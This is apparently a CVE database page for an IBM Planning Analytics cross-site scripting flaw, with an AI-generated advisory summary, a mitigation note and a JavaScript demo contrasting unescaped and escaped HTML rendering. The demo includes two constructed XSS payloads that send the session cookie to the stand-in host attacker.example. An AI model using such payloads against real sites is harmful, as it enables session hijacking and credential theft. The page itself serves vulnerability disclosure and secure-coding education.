CVE-2018-1933
Description
IBM Planning Analytics 2.0 through 2.0.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 153177.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
IBM Planning Analytics 2.0 through 2.0.6 is vulnerable to cross-site scripting in the Web UI; script injected by one user runs inside another user's trusted session and can disclose that user's credentials.
Vulnerability
IBM Planning Analytics versions 2.0 through 2.0.6 are vulnerable to cross-site scripting (XSS) in the Web UI. The affected component is the Dojo create_widgets.html page (part of the Dojo Toolkit bundled with PMHub) [1]. User-supplied input reaches the rendered page without proper output encoding, so an attacker can embed arbitrary JavaScript that executes in the context of another user's trusted session.
Exploitation
An attacker needs no special network position beyond the ability to submit crafted input to the affected Web UI component, but does need a valid account with access to the Planning Analytics interface [1]. Exploitation consists of placing script in an input field whose value is later rendered into a victim's page without encoding; the script runs in the victim's browser when the victim views that page.
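The mechanism described above, as an added illustration that is not part of the original advisory and is not IBM Planning Analytics or Dojo code: user input concatenated into markup without output encoding, beside the encoded version. The page templates, field names, the hostname attacker.example and both payloads are constructed for the demo; nothing here reproduces the affected create_widgets.html component.

```javascript
// Illustrative XSS example for this CVE page. NOT IBM Planning Analytics code;
// it does not reproduce the affected create_widgets.html component. Templates,
// field names, attacker.example and both payloads are constructed for the demo.

// HTML entity encoding that is safe for text nodes and for values placed inside
// double- or single-quoted attributes. It does not make input safe inside <script>
// blocks, URLs or unquoted attributes; those contexts need their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: a stored display name goes straight into a text node.
function renderGreetingUnsafe(displayName) {
  return `<div class="user">Welcome, ${displayName}</div>`;
}

// Hardened: same template, value encoded for the HTML text context.
function renderGreetingSafe(displayName) {
  return `<div class="user">Welcome, ${escapeHtml(displayName)}</div>`;
}

// Vulnerable: a stored value echoed into a quoted attribute, so a payload that
// closes the quote can add an event-handler attribute of its own.
function renderSearchBoxUnsafe(lastQuery) {
  return `<input name="q" value="${lastQuery}">`;
}

// Hardened: quote characters are encoded, so the value cannot leave the attribute.
function renderSearchBoxSafe(lastQuery) {
  return `<input name="q" value="${escapeHtml(lastQuery)}">`;
}

// Crude stand-in for a browser: after blanking out quoted attribute values, does
// the fragment still contain a <script> element or an on* handler attribute?
// Enough to show the difference here; not a substitute for a real HTML parser.
function containsActiveContent(html) {
  const withoutQuotedValues = html.replace(/"[^"]*"|'[^']*'/g, '""');
  return /<script\b/i.test(withoutQuotedValues) ||
    /<[^>]*\son\w+\s*=/i.test(withoutQuotedValues);
}

// Constructed payloads. The first sends the session cookie to an attacker host
// (credential disclosure within a trusted session); the second breaks out of an
// attribute value and attaches an event handler that fires on focus.
const SCRIPT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';
const ATTRIBUTE_PAYLOAD =
  '" onfocus="fetch(\'https://attacker.example/c?\'+document.cookie)" autofocus="';

// Runs both payloads through both renderers and reports which outputs stay live.
function demo() {
  return {
    greetingUnsafe: containsActiveContent(renderGreetingUnsafe(SCRIPT_PAYLOAD)),
    greetingSafe: containsActiveContent(renderGreetingSafe(SCRIPT_PAYLOAD)),
    searchUnsafe: containsActiveContent(renderSearchBoxUnsafe(ATTRIBUTE_PAYLOAD)),
    searchSafe: containsActiveContent(renderSearchBoxSafe(ATTRIBUTE_PAYLOAD)),
  };
}

console.log(demo());
// { greetingUnsafe: true, greetingSafe: false, searchUnsafe: true, searchSafe: false }
```

The fix is the same in both contexts: encode at output time for the context the value lands in. Encoding on input (or only stripping `<script>`) would still let the attribute payload through, which is why the demo includes it.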
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser, inside the victim's authenticated session. This can disclose credentials or session tokens, enable session hijacking, or let the attacker perform any action the victim is authorised to perform, compromising the confidentiality and integrity of the Planning Analytics instance [1].
Mitigation
IBM Planning Analytics 2.0.7, released with the associated security bulletin, fixes this vulnerability [1]. Upgrade to 2.0.7 or later; the references document no workaround other than upgrading [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: >=2.0, <=2.0.6
- Range: 2.0.3
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- [1] www.ibm.com/support/docview.wss (IBM security bulletin, vendor confirmation)
- [2] www.securityfocus.com/bid/108191 (SecurityFocus BID entry)
- [3] exchange.xforce.ibmcloud.com/vulnerabilities/153177 (IBM X-Force entry)
News mentions
No linked articles in our index yet.